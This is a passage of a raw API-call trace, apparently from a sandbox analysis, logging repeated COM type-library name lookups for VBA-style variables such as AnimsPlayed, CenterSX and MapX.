lHashVal=0x109d7a, pfName=0x2e43a0, pBstrLibName=0x2e42d0 | out: pfName=0x2e43a0*=0, pBstrLibName=0x2e42d0) returned 0x0 [0045.505] IUnknown:Release (This=0x731da90) returned 0x15 [0045.505] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.505] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="AnimsPlayed", lHashVal=0x109d7a, pfName=0x2e43a0, pBstrLibName=0x2e42d0 | out: pfName=0x2e43a0*=0, pBstrLibName=0x2e42d0) returned 0x0 [0045.505] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.505] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.505] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="AnimsPlayed", lHashVal=0x109d7a, pfName=0x2e43a0, pBstrLibName=0x2e42d0 | out: pfName=0x2e43a0*=0, pBstrLibName=0x2e42d0) returned 0x0 [0045.505] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.505] IMalloc:Alloc (This=0x7fefe015380, cb=0x13) returned 0xb494df0 [0045.505] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_AnimsPlayed") returned 0x108edc [0045.505] strcpy_s (in: _Dst=0x2e4630, _DstSize=0x13, _Src="_B_var_AnimsPlayed" | out: _Dst="_B_var_AnimsPlayed") returned 0x0 [0045.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4630, cbMultiByte=19, lpWideCharStr=0x2e4480, cchWideChar=19 | out: lpWideCharStr="_B_var_AnimsPlayed") returned 19 [0045.505] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.505] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_AnimsPlayed", lHashVal=0x108edc, pfName=0x2e4550, pBstrLibName=0x2e4480 | out: pfName=0x2e4550*=0, pBstrLibName=0x2e4480) returned 0x0 [0045.505] IUnknown:Release (This=0x782a220) returned 0x22 [0045.505] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.505] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_AnimsPlayed", lHashVal=0x108edc, pfName=0x2e4550, pBstrLibName=0x2e4480 | out: pfName=0x2e4550*=0, pBstrLibName=0x2e4480) returned 0x0 [0045.505] IUnknown:Release (This=0x731da90) returned 0x15 [0045.505] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.505] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_AnimsPlayed", lHashVal=0x108edc, pfName=0x2e4550, pBstrLibName=0x2e4480 | out: pfName=0x2e4550*=0, pBstrLibName=0x2e4480) returned 0x0 [0045.505] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.505] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.505] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_AnimsPlayed", lHashVal=0x108edc, pfName=0x2e4550, pBstrLibName=0x2e4480 | out: pfName=0x2e4550*=0, pBstrLibName=0x2e4480) returned 0x0 [0045.505] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.505] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.505] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_AnimsPlayed", lHashVal=0x108edc, pfName=0x2e4550, pBstrLibName=0x2e4480 | out: pfName=0x2e4550*=0, pBstrLibName=0x2e4480) returned 0x0 [0045.505] IUnknown:Release (This=0x782b300) returned 0x6 [0045.505] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.505] IUnknown:Release (This=0x782a220) returned 0x22 [0045.505] IMalloc:Free (This=0x7fefe015380, pv=0xb494df0) [0045.505] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MeNum") returned 0x104c1b [0045.505] strcpy_s (in: _Dst=0x2e4540, _DstSize=0x6, _Src="MeNum" | out: _Dst="MeNum") returned 0x0 [0045.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4540, cbMultiByte=6, lpWideCharStr=0x2e4390, cchWideChar=6 | out: lpWideCharStr="MeNum") returned 6 [0045.505] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.505] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="MeNum", lHashVal=0x104c1b, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.506] IUnknown:Release (This=0x782a220) returned 0x22 [0045.506] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.506] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="MeNum", lHashVal=0x104c1b, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.506] IUnknown:Release (This=0x731da90) returned 0x15 [0045.506] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.506] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="MeNum", lHashVal=0x104c1b, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.506] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.506] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.506] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="MeNum", lHashVal=0x104c1b, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.506] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.506] IMalloc:Alloc (This=0x7fefe015380, cb=0xd) returned 0xb494df0 [0045.506] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_MeNum") returned 0x101008 [0045.506] strcpy_s (in: _Dst=0x2e46f0, _DstSize=0xd, _Src="_B_var_MeNum" | out: _Dst="_B_var_MeNum") returned 0x0 [0045.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46f0, cbMultiByte=13, lpWideCharStr=0x2e4540, cchWideChar=13 | out: lpWideCharStr="_B_var_MeNum") returned 13 [0045.506] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.506] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_MeNum", lHashVal=0x101008, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.506] IUnknown:Release (This=0x782a220) returned 0x22 [0045.506] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.506] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_MeNum", lHashVal=0x101008, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.506] IUnknown:Release (This=0x731da90) returned 0x15 [0045.506] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.506] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_MeNum", lHashVal=0x101008, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.506] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.506] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.506] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_MeNum", lHashVal=0x101008, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.506] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.506] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.506] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_MeNum", lHashVal=0x101008, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.506] IUnknown:Release (This=0x782b300) returned 0x6 [0045.506] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.506] IUnknown:Release (This=0x782a220) returned 0x22 [0045.506] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Playe") returned 0x102407 [0045.506] strcpy_s (in: _Dst=0x2e4540, _DstSize=0x6, _Src="Playe" | out: _Dst="Playe") returned 0x0 [0045.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4540, cbMultiByte=6, lpWideCharStr=0x2e4390, cchWideChar=6 | out: lpWideCharStr="Playe") returned 6 [0045.506] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.506] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="Playe", lHashVal=0x102407, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.506] IUnknown:Release (This=0x782a220) returned 0x22 [0045.506] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.506] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="Playe", lHashVal=0x102407, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.506] IUnknown:Release (This=0x731da90) returned 0x15 [0045.506] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.506] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="Playe", lHashVal=0x102407, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.506] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.506] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.506] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="Playe", lHashVal=0x102407, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.507] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.507] IMalloc:Alloc (This=0x7fefe015380, cb=0xd) returned 0xb494df0 [0045.507] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Playe") returned 0x10e833 [0045.507] strcpy_s (in: _Dst=0x2e46f0, _DstSize=0xd, _Src="_B_var_Playe" | out: _Dst="_B_var_Playe") returned 0x0 [0045.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46f0, cbMultiByte=13, lpWideCharStr=0x2e4540, cchWideChar=13 | out: lpWideCharStr="_B_var_Playe") returned 13 [0045.507] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.507] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_Playe", lHashVal=0x10e833, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.507] IUnknown:Release (This=0x782a220) returned 0x22 [0045.507] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.507] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_Playe", lHashVal=0x10e833, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.507] IUnknown:Release (This=0x731da90) returned 0x15 [0045.507] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.507] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_Playe", lHashVal=0x10e833, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.507] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.507] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.507] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_Playe", lHashVal=0x10e833, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.507] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.507] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.507] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_Playe", lHashVal=0x10e833, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.507] IUnknown:Release (This=0x782b300) returned 0x6 [0045.507] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.507] IUnknown:Release (This=0x782a220) returned 0x22 [0045.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c72, cbMultiByte=4, lpWideCharStr=0x2e4400, cchWideChar=3 | out: lpWideCharStr="rs") returned 0 [0045.507] wcscpy_s (in: _Destination=0xb64be58, _SizeInWords=0x3, _Source="rs" | out: _Destination="rs") returned 0x0 [0045.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c96, cbMultiByte=7, lpWideCharStr=0x2e4400, cchWideChar=6 | out: lpWideCharStr="charX") returned 0 [0045.507] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CenterSX") returned 0x10e535 [0045.507] strcpy_s (in: _Dst=0x2e4540, _DstSize=0x9, _Src="CenterSX" | out: _Dst="CenterSX") returned 0x0 [0045.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4540, cbMultiByte=9, lpWideCharStr=0x2e4390, cchWideChar=9 | out: lpWideCharStr="CenterSX") returned 9 [0045.507] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.507] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="CenterSX", lHashVal=0x10e535, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.507] IUnknown:Release (This=0x782a220) returned 0x22 [0045.507] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.507] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="CenterSX", lHashVal=0x10e535, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.507] IUnknown:Release (This=0x731da90) returned 0x15 [0045.507] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.507] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="CenterSX", lHashVal=0x10e535, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.507] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.507] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.507] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="CenterSX", lHashVal=0x10e535, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.507] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.508] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494df0 [0045.508] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_CenterSX") returned 0x10bcbe [0045.508] strcpy_s (in: _Dst=0x2e46f0, _DstSize=0x10, _Src="_B_var_CenterSX" | out: _Dst="_B_var_CenterSX") returned 0x0 [0045.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46f0, cbMultiByte=16, lpWideCharStr=0x2e4540, cchWideChar=16 | out: lpWideCharStr="_B_var_CenterSX") returned 16 [0045.508] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.508] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_CenterSX", lHashVal=0x10bcbe, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.508] IUnknown:Release (This=0x782a220) returned 0x22 [0045.508] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.508] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_CenterSX", lHashVal=0x10bcbe, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.508] IUnknown:Release (This=0x731da90) returned 0x15 [0045.508] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.508] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_CenterSX", lHashVal=0x10bcbe, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.508] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.508] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.508] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_CenterSX", lHashVal=0x10bcbe, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.508] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.508] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.508] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_CenterSX", lHashVal=0x10bcbe, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.508] IUnknown:Release (This=0x782b300) returned 0x6 [0045.508] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.508] IUnknown:Release (This=0x782a220) returned 0x22 [0045.508] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MeX") returned 0x10b35c [0045.508] IMalloc:Alloc (This=0x7fefe015380, cb=0xb) returned 0xb494df0 [0045.508] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_MeX") returned 0x10706d [0045.508] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.508] IUnknown:Release (This=0x782a220) returned 0x22 [0045.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c72, cbMultiByte=4, lpWideCharStr=0x2e4400, cchWideChar=3 | out: lpWideCharStr="rs") returned 0 [0045.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52cea, cbMultiByte=7, lpWideCharStr=0x2e4400, cchWideChar=6 | out: lpWideCharStr="charY") returned 0 [0045.508] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CenterSY") returned 0x10e532 [0045.508] strcpy_s (in: _Dst=0x2e4540, _DstSize=0x9, _Src="CenterSY" | out: _Dst="CenterSY") returned 0x0 [0045.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4540, cbMultiByte=9, lpWideCharStr=0x2e4390, cchWideChar=9 | out: lpWideCharStr="CenterSY") returned 9 [0045.509] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.509] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="CenterSY", lHashVal=0x10e532, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.509] IUnknown:Release (This=0x782a220) returned 0x22 [0045.509] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.509] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="CenterSY", lHashVal=0x10e532, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.509] IUnknown:Release (This=0x731da90) returned 0x15 [0045.509] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.509] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="CenterSY", lHashVal=0x10e532, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.509] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.509] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.509] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="CenterSY", lHashVal=0x10e532, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.509] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.509] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494df0 [0045.509] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_CenterSY") returned 0x10bcbb [0045.509] strcpy_s (in: _Dst=0x2e46f0, _DstSize=0x10, _Src="_B_var_CenterSY" | out: _Dst="_B_var_CenterSY") returned 0x0 [0045.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46f0, cbMultiByte=16, lpWideCharStr=0x2e4540, cchWideChar=16 | out: lpWideCharStr="_B_var_CenterSY") returned 16 [0045.509] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.509] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_CenterSY", lHashVal=0x10bcbb, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.509] IUnknown:Release (This=0x782a220) returned 0x22 [0045.509] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.509] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_CenterSY", lHashVal=0x10bcbb, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.509] IUnknown:Release (This=0x731da90) returned 0x15 [0045.509] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.509] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_CenterSY", lHashVal=0x10bcbb, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.509] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.509] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.509] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_CenterSY", lHashVal=0x10bcbb, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.509] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.509] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.509] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_CenterSY", lHashVal=0x10bcbb, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.509] IUnknown:Release (This=0x782b300) returned 0x6 [0045.509] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.509] IUnknown:Release (This=0x782a220) returned 0x22 [0045.509] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MeY") returned 0x10b359 [0045.509] IMalloc:Alloc (This=0x7fefe015380, cb=0xb) returned 0xb494df0 [0045.509] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_MeY") returned 0x10706a [0045.509] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.509] IUnknown:Release (This=0x782a220) returned 0x22 [0045.510] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MapX") returned 0x102d95 [0045.510] strcpy_s (in: _Dst=0x2e4540, _DstSize=0x5, _Src="MapX" | out: _Dst="MapX") returned 0x0 [0045.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4540, cbMultiByte=5, lpWideCharStr=0x2e4390, cchWideChar=5 | out: lpWideCharStr="MapX") returned 5 [0045.510] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.510] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="MapX", lHashVal=0x102d95, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.510] IUnknown:Release (This=0x782a220) returned 0x22 [0045.510] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.510] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="MapX", lHashVal=0x102d95, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.510] IUnknown:Release (This=0x731da90) returned 0x15 [0045.510] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.510] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="MapX", lHashVal=0x102d95, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.510] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.510] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.510] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="MapX", lHashVal=0x102d95, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.510] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.510] IMalloc:Alloc (This=0x7fefe015380, cb=0xc) returned 0xb494df0 [0045.510] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_MapX") returned 0x109301 [0045.510] strcpy_s (in: _Dst=0x2e46f0, _DstSize=0xc, _Src="_B_var_MapX" | out: _Dst="_B_var_MapX") returned 0x0 [0045.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46f0, cbMultiByte=12, lpWideCharStr=0x2e4540, cchWideChar=12 | out: lpWideCharStr="_B_var_MapX") returned 12 [0045.510] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.510] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_MapX", lHashVal=0x109301, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.510] IUnknown:Release (This=0x782a220) returned 0x22 [0045.510] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.510] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_MapX", lHashVal=0x109301, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.510] IUnknown:Release (This=0x731da90) returned 0x15 [0045.510] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.510] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_MapX", lHashVal=0x109301, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.510] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.510] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.510] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_MapX", lHashVal=0x109301, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.510] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.510] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.510] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_MapX", lHashVal=0x109301, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.510] IUnknown:Release (This=0x782b300) returned 0x6 [0045.510] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.510] IUnknown:Release (This=0x782a220) returned 0x22 [0045.510] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MapY") returned 0x102d92 [0045.510] strcpy_s (in: _Dst=0x2e4540, _DstSize=0x5, _Src="MapY" | out: _Dst="MapY") returned 0x0 [0045.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4540, cbMultiByte=5, lpWideCharStr=0x2e4390, cchWideChar=5 | out: lpWideCharStr="MapY") returned 5 [0045.510] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.510] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="MapY", lHashVal=0x102d92, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.510] IUnknown:Release (This=0x782a220) returned 0x22 [0045.510] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.511] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="MapY", lHashVal=0x102d92, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.511] IUnknown:Release (This=0x731da90) returned 0x15 [0045.511] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.511] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="MapY", lHashVal=0x102d92, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.511] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.511] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.511] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="MapY", lHashVal=0x102d92, pfName=0x2e4460, 